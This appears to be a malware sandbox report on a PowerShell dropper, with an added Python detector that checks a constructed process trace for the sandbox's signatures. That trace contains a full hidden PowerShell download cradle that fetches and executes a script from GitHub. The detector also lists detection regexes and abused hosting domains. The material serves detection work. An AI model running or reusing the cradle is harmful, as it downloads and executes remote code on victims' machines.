General

  • Target

    832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284

  • Size

    44KB

  • Sample

    240709-15sm8a1aqg

  • MD5

    1e9ed7e79c0f48996fedb74189895ae6

  • SHA1

    e0f104e40847774f3ca32fff30bdfc4548691b02

  • SHA256

    832dc1da08ddc7f542938b77b768cd40c8b7eaf3a430c6058d8af80400515284

  • SHA512

    2c648e9ef3e931ea9a0e182b75cc0d2db4d2ee478082ade6654f0d1e8b3cfc516c515031e260283c830b08f39ed1f946d1c7f468be18be99441cfbff8e3fc5e4

  • SSDEEP

    768:Ytvo+lzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSp5kuFlmQQpIvH9acc9acyL:IPk3hbdlylKsgqopeJBWhZFGkE+cL2N5

Malware Config

Extracted

  • Language

    ps1

  • URLs (ps1.dropper)

    https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or a macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with a hidden display window.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely as a geofence check.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
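The signatures above describe one chain: an Office parent spawning a hidden PowerShell, a download cradle pulling a script from a legitimate hosting service (here raw.githubusercontent.com), a read of the machine's country/location setting, and a file written under System32. As an added example, not code from the tria.ge report or the sandbox's own detection engine, the checks below re-implement those signatures in Python over a constructed trace. The trace events, the rule names, the abused-host list and the GeoID registry key used for the location check are all this example's assumptions. One caveat for anyone porting this to endpoint telemetry: Sysmon records registry key creation, value sets and renames but not reads, so the location check is visible in a sandbox API trace or a registry ETW provider, not in Sysmon process-creation logs.

```python
"""Behavioural checks mirroring the sandbox signatures, run over a constructed
trace. Events, rule names, ABUSED_HOSTS and GEO_KEY are this example's
assumptions, not the sandbox's own rules or output."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
# Legitimate services routinely abused to stage payloads (assumed list; tune per environment).
ABUSED_HOSTS = {"raw.githubusercontent.com", "github.com", "pastebin.com",
                "cdn.discordapp.com", "transfer.sh"}
# Registry value behind the Windows "Country or region" (GeoID) setting; assumed
# to be what a "checks computer location settings" signature keys on.
GEO_KEY = r"hkcu\control panel\international\geo\nation"
SYSTEM32 = "c:\\windows\\system32\\"

HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)   # -W Hidden / -WindowStyle Hidden
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                       r"|net\.webclient|start-bitstransfer", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_urls(events):
    """Every URL found in process command lines (the dropper's 'extracted config')."""
    return [u for ev in events if ev["type"] == "process"
            for u in URL_RE.findall(ev["cmdline"])]


def analyze(events):
    """Apply the five rules; an empty list means nothing fired."""
    findings = []
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process":
            img, parent, cmd = _base(ev["image"]), _base(ev["parent_image"]), ev["cmdline"]
            if parent in OFFICE_PARENTS and img in SCRIPT_HOSTS:
                findings.append(Finding("office_spawns_script_host", pid, f"{parent} -> {img}"))
            hidden = HIDDEN_RE.search(cmd)
            if img in {"powershell.exe", "pwsh.exe"} and hidden:
                findings.append(Finding("hidden_powershell_window", pid, hidden.group(0)))
            if CRADLE_RE.search(cmd):
                for url in URL_RE.findall(cmd):
                    if (urlparse(url).hostname or "").lower() in ABUSED_HOSTS:
                        findings.append(Finding("payload_from_abused_hosting", pid, url))
        elif ev["type"] == "registry_read" and ev["key"].lower() == GEO_KEY:
            findings.append(Finding("location_check", pid, f"{ev['key']} = {ev['value']}"))
        elif ev["type"] == "file_write" and ev["path"].lower().startswith(SYSTEM32):
            findings.append(Finding("drops_file_in_system32", pid, ev["path"]))
    return findings


# Constructed trace of the chain the signatures describe (not sandbox output).
MALICIOUS_TRACE = [
    {"type": "process", "pid": 2100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.docm"'},
    {"type": "process", "pid": 2212,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')\""},
    {"type": "registry_read", "pid": 2212,
     "key": r"HKCU\Control Panel\International\Geo\Nation", "value": "244"},
    {"type": "file_write", "pid": 2212, "path": r"C:\Windows\System32\update.ps1"},
]

# Constructed benign activity: admin script from Explorer, visible window, internal host.
BENIGN_TRACE = [
    {"type": "process", "pid": 3001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1 -Server https://cmdb.corp.example/api"},
    {"type": "file_write", "pid": 3001, "path": r"C:\Users\admin\inventory.csv"},
]

if __name__ == "__main__":
    for f in analyze(MALICIOUS_TRACE):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
    print("extracted URLs:", extract_urls(MALICIOUS_TRACE))
    print("benign findings:", analyze(BENIGN_TRACE))
```

The parent/child rule is the high-signal one: Office binaries have no legitimate reason to launch a script host, so that pairing alone justifies the "process spawned unexpected child" verdict even before the command line is inspected. The hidden-window and cradle rules are weaker on their own (administrators do run hidden PowerShell) and are best weighted, as the sandbox does, in combination.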
